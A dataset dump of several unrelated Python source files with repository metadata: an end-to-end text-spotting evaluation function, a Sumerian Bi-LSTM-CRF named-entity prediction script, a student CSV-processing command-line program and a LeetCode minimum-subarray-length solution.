if pred_str_cur == gt_str_cur:
hit_str_num += 1
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
# recg end
elif (np.sum(local_sigma_table[gt_id, qualified_tau_candidates])
>= tr):
gt_flag[0, gt_id] = 1
det_flag[0, qualified_tau_candidates] = 1
# recg start
gt_str_cur = global_gt_str[idy][gt_id]
pred_str_cur = global_pred_str[idy][
qualified_tau_candidates[0].tolist()[0]]
if pred_str_cur == gt_str_cur:
hit_str_num += 1
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
# recg end
global_accumulative_recall = global_accumulative_recall + fsc_k
global_accumulative_precision = global_accumulative_precision + num_qualified_tau_candidates * fsc_k
local_accumulative_recall = local_accumulative_recall + fsc_k
local_accumulative_precision = local_accumulative_precision + num_qualified_tau_candidates * fsc_k
return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag, hit_str_num
def many_to_one(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idy):
hit_str_num = 0
for det_id in range(num_det):
# skip the following if the detection was matched
if det_flag[0, det_id] > 0:
continue
non_zero_in_tau = np.where(local_tau_table[:, det_id] > 0)
num_non_zero_in_tau = non_zero_in_tau[0].shape[0]
if num_non_zero_in_tau >= k:
####search for all detections that overlaps with this groundtruth
qualified_sigma_candidates = np.where((
local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0))
num_qualified_sigma_candidates = qualified_sigma_candidates[
0].shape[0]
if num_qualified_sigma_candidates == 1:
if ((local_tau_table[qualified_sigma_candidates, det_id] >=
tp) and
(local_sigma_table[qualified_sigma_candidates, det_id]
>= tr)):
# became an one-to-one case
global_accumulative_recall = global_accumulative_recall + 1.0
global_accumulative_precision = global_accumulative_precision + 1.0
local_accumulative_recall = local_accumulative_recall + 1.0
local_accumulative_precision = local_accumulative_precision + 1.0
gt_flag[0, qualified_sigma_candidates] = 1
det_flag[0, det_id] = 1
# recg start
pred_str_cur = global_pred_str[idy][det_id]
gt_len = len(qualified_sigma_candidates[0])
for idx in range(gt_len):
ele_gt_id = qualified_sigma_candidates[0].tolist()[
idx]
if ele_gt_id not in global_gt_str[idy]:
continue
gt_str_cur = global_gt_str[idy][ele_gt_id]
if pred_str_cur == gt_str_cur:
hit_str_num += 1
break
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
break
# recg end
elif (np.sum(local_tau_table[qualified_sigma_candidates,
det_id]) >= tp):
det_flag[0, det_id] = 1
gt_flag[0, qualified_sigma_candidates] = 1
# recg start
pred_str_cur = global_pred_str[idy][det_id]
gt_len = len(qualified_sigma_candidates[0])
for idx in range(gt_len):
ele_gt_id = qualified_sigma_candidates[0].tolist()[idx]
if ele_gt_id not in global_gt_str[idy]:
continue
gt_str_cur = global_gt_str[idy][ele_gt_id]
if pred_str_cur == gt_str_cur:
hit_str_num += 1
break
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
break
# recg end
global_accumulative_recall = global_accumulative_recall + num_qualified_sigma_candidates * fsc_k
global_accumulative_precision = global_accumulative_precision + fsc_k
local_accumulative_recall = local_accumulative_recall + num_qualified_sigma_candidates * fsc_k
local_accumulative_precision = local_accumulative_precision + fsc_k
return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag, hit_str_num
for idx in range(len(global_sigma)):
local_sigma_table = np.array(global_sigma[idx])
local_tau_table = global_tau[idx]
num_gt = local_sigma_table.shape[0]
num_det = local_sigma_table.shape[1]
total_num_gt = total_num_gt + num_gt
total_num_det = total_num_det + num_det
local_accumulative_recall = 0
local_accumulative_precision = 0
gt_flag = np.zeros((1, num_gt))
det_flag = np.zeros((1, num_det))
#######first check for one-to-one case##########
local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
gt_flag, det_flag, hit_str_num = one_to_one(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idx)
hit_str_count += hit_str_num
#######then check for one-to-many case##########
local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
gt_flag, det_flag, hit_str_num = one_to_many(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idx)
hit_str_count += hit_str_num
#######then check for many-to-one case##########
local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
gt_flag, det_flag, hit_str_num = many_to_one(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idx)
hit_str_count += hit_str_num
try:
recall = global_accumulative_recall / total_num_gt
except ZeroDivisionError:
recall = 0
try:
precision = global_accumulative_precision / total_num_det
except ZeroDivisionError:
precision = 0
try:
f_score = 2 * precision * recall / (precision + recall)
except ZeroDivisionError:
f_score = 0
try:
seqerr = 1 - float(hit_str_count) / global_accumulative_recall
except ZeroDivisionError:
seqerr = 1
try:
recall_e2e = float(hit_str_count) / total_num_gt
except ZeroDivisionError:
recall_e2e = 0
try:
precision_e2e = float(hit_str_count) / total_num_det
except ZeroDivisionError:
precision_e2e = 0
try:
f_score_e2e = 2 * precision_e2e * recall_e2e / (
precision_e2e + recall_e2e)
except ZeroDivisionError:
f_score_e2e = 0
final = {
'total_num_gt': total_num_gt,
'total_num_det': total_num_det,
'global_accumulative_recall': global_accumulative_recall,
'hit_str_count': hit_str_count,
'recall': recall,
'precision': precision,
'f_score': f_score,
'seqerr': seqerr,
'recall_e2e': recall_e2e,
'precision_e2e': precision_e2e,
'f_score_e2e': f_score_e2e
}
return final
| [
"[email protected]"
] | |
9740a784c28c5936eb88c7f8f815058a076965da | a1c0f06a1454dba2cc78686d6c25776560bfbf6f | /NER_Models/NER_Bi_LSTM_CRF/prediction.py | f4a16fc0eccb838ce3b024ac42b5a5380f89b672 | [
"MIT"
] | permissive | byronblaze-ml/Sumerian-Translation-Pipeline | 4bbbec70ae167097b9233643a12b83fd498b2ea4 | db9ab384af249bf9950cc16b9df5bd593ee3adfa | refs/heads/main | 2023-03-01T21:12:48.094034 | 2021-01-27T03:13:13 | 2021-01-27T03:13:13 | 313,330,057 | 0 | 0 | MIT | 2020-11-16T14:35:52 | 2020-11-16T14:35:51 | null | UTF-8 | Python | false | false | 3,941 | py | import numpy as np
import pandas as pd
import argparse
from collections import OrderedDict
from keras.models import load_model
from keras.preprocessing.sequence import pad_sequences
from keras_contrib.layers import CRF
from keras_contrib.losses import crf_loss
from keras_contrib.metrics import crf_viterbi_accuracy
def Openfile(filename):
Monolingual_sumerian=[]
with open(filename) as f:
for line in f:
line=line.strip()
Monolingual_sumerian.append(line)
return Monolingual_sumerian
def Savefile(Monolingual_sumerian,POS_list):
with open(args.output, 'w') as f:
for i in range(len(POS_list)):
f.write("%s\n" %str(i+1))
f.write("sentence: %s\n" %Monolingual_sumerian[i])
f.write("NER:%s\n" % POS_list[i])
print()
def preparedicts(df):
with open("NER_Models/NER_Bi_LSTM_CRF/Sumerian_Vocab.pkl",'rb') as f:
vocabulary=pickle.load(f)
word2idx,idx2word,tag2idx,idx2tag=vocabulary
return word2idx,idx2word,tag2idx,idx2tag
def preparetestData(sentences,word2idx):
X=[]
for s in sentences:
l=[]
s=s.split()
for w in s:
try:
l.append(word2idx[w])
except KeyError:
l.append(word2idx["UNK"])
X.append(l)
X = pad_sequences(maxlen=MAX, sequences=X, padding="post", value=word2idx["<end>"])
return X
def pred2label(pred,idx2tag):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
p_i = np.argmax(p)
tag=idx2tag[p_i]
out_i.append(tag)
out.append(out_i)
return out
def Predict_Testtag(loaded_model,X,Monolingual_sumerian,idx2tag):
test_pred = loaded_model.predict(X, verbose=1)
y_pred = pred2label(test_pred,idx2tag)
for i in range(len(Monolingual_sumerian)):
s=Monolingual_sumerian[i].split()
y_pred[i]=y_pred[i][:len(s)]
return y_pred
def POSLIST(Monolingual_sumerian,Prediction):
my_list=[]
for i in range(len(Monolingual_sumerian)):
print(i+1)
print("sentence: "+Monolingual_sumerian[i])
l=Monolingual_sumerian[i].split()
POS=""
for j in range(len(l)):
POS=POS+"("+l[j]+","+Prediction[i][j]+")"+" "
print('NER:'+POS)
my_list.append(POS)
print()
return my_list
def main():
Monolingual_sumerian=Openfile(args.input)
loaded_model = load_model(args.saved,custom_objects={'CRF':CRF,
'crf_loss':crf_loss,
'crf_viterbi_accuracy':crf_viterbi_accuracy})
word2idx,idx2word,tag2idx,idx2tag= preparedicts()
X=preparetestData(Monolingual_sumerian,word2idx)
Prediction=Predict_Testtag(loaded_model,X,Monolingual_sumerian,idx2tag)
POS_list=POSLIST(Monolingual_sumerian,Prediction)
print("Saving_file "+args.output)
Savefile(Monolingual_sumerian,POS_list)
if __name__=='__main__':
# max sentence length is set to 50
MAX=50
#Input_path='Dataset/Augmented_NER_training_ml.csv'
#Embedding_path='Word_Embeddings/sumerian_word2vec_50.txt'
parser = argparse.ArgumentParser()
parser.add_argument("-i","--input",help="Location of the Input text file to be predicted", default="Dataset/sumerian_demo.txt")
parser.add_argument("-s","--saved",help="Location of saved CRF weights in .h5 format", default="Saved_Models/NER/NER_Bi_LSTM_CRF.h5" )
parser.add_argument("-o","--output",help="Location of output text file(Result)", default='Output/NER_Bi_LSTM_CRF.txt')
args=parser.parse_args()
print("\n")
print("Input file is ", args.input)
print("Saved model is ", args.saved)
print("Output file will be ", args.output)
print("\n")
main()
| [
"[email protected]"
] | |
ae211130b95fc273379e0fb01c2c2a85ffa37afc | 85193841489787aafe55783e3a866b6a128ae3b6 | /main.py | ed32182884ac2453c43ba982e5d5287c1960eed2 | [] | no_license | tungrg/KTDL-1 | 8126934b82a662986e0be738c3c55f9475ca125b | 72b4779d69202d2141c6e6a2b88163212639ffe7 | refs/heads/main | 2023-03-02T04:04:49.980565 | 2021-02-01T14:20:36 | 2021-02-01T14:20:36 | 334,970,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,811 | py | import sys
import csv
import Cau01
import Cau02
import Cau03
import Cau04
import Cau05
import Cau06
import Cau07
import Cau08
#doc file csv
def readFile(inputFile):
#tạo biến để lưu dữ liệu đọc được
listRow = []
with open(inputFile) as csvfile:
#Hàm csv.DictReader đọc file csv rồi lưu vào 1 biến, biến này mang kiểu dữ liệu dictionary
reader = csv.DictReader(csvfile)
for row in reader:
#chuyển sang lưu dạng list
listRow.append(row)
return listRow
def writeFile(outputFile,listRow):
with open(outputFile, 'w', newline='') as csvfile:
#ghi file csv theo kiểu dữ liệu của dictionary
writer = csv.DictWriter(csvfile, fieldnames = listRow[0].keys())
#ghi tên các cột trước
writer.writeheader()
for row in listRow:
writer.writerow(row)
if __name__ == '__main__':
input_file_name = str(sys.argv[1])
listRow = readFile(input_file_name)
if str(sys.argv[2]) == "cau01":
res = Cau01.cau01(listRow)
for x, y in res.items():
print(x, '-', y)
elif str(sys.argv[2]) == "cau02":
Cau02.cau02(listRow)
elif str(sys.argv[2]) == "cau03":
if str(sys.argv[3]) == "mean":
temp = Cau03.calculateMean(listRow)
writeFile(str(sys.argv[4]), temp)
elif str(sys.argv[3]) == "median":
temp = Cau03.calculateMedian(listRow)
writeFile(str(sys.argv[4]), temp)
elif str(sys.argv[2]) == "cau04":
temp = Cau04.deleteRow(listRow, str(sys.argv[3]))
writeFile(str(sys.argv[4]), temp)
elif str(sys.argv[2]) == "cau05":
temp = Cau05.deleteColumn(listRow, str(sys.argv[3]))
writeFile(str(sys.argv[4]), temp)
elif str(sys.argv[2]) == "cau06":
temp = Cau06.DeleteDuplicateRows(listRow)
writeFile(str(sys.argv[3]), temp)
elif str(sys.argv[2]) == "cau07":
if str(sys.argv[3]) == "Min-Max":
temp = Cau07.setAttributeByMin_MaxMethod(listRow, sys.argv[4])
if temp == 0:
print("This row cann't standardize!.")
else:
writeFile(str(sys.argv[5]), temp)
elif str(sys.argv[3]) == "Z-Score":
temp = Cau07.setAttributeByZ_ScoreMethod(listRow, sys.argv[4])
if temp == 0:
print("This row cann't standardize!.")
else:
writeFile(str(sys.argv[5]), temp)
elif str(sys.argv[2]) == "cau08":
temp = Cau08.addColumn(listRow, sys.argv[3])
if temp == 0:
print("Wrong input expression.")
else:
writeFile(str(sys.argv[4]), temp) | [
"[email protected]"
] | |
f56639edc40ac8497ea6977336f9f3e59e3eab8d | 523f8f5febbbfeb6d42183f2bbeebc36f98eadb5 | /209_1.py | 6be6ee33df1f183ba7cd0d044dc5df398b7851a1 | [] | no_license | saleed/LeetCode | 655f82fdfcc3000400f49388e97fc0560f356af0 | 48b43999fb7e2ed82d922e1f64ac76f8fabe4baa | refs/heads/master | 2022-06-15T21:54:56.223204 | 2022-05-09T14:05:50 | 2022-05-09T14:05:50 | 209,430,056 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 780 | py | class Solution(object):
def minSubArrayLen(self, target, nums):
"""
:type target: int
:type nums: List[int]
:rtype: int
"""
if len(nums)==0:
return 0
i=0
j=0
max_seq=float("inf")
tmpsum=0
while True:
if tmpsum>=target:
print(j,i)
max_seq=min(j-i,max_seq)
if i<len(nums):
tmpsum-=nums[i]
i+=1
else:
break
else:
if j<len(nums):
tmpsum+=nums[j]
j+=1
else:
break
if max_seq==float("inf"):
return 0
return max_seq | [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.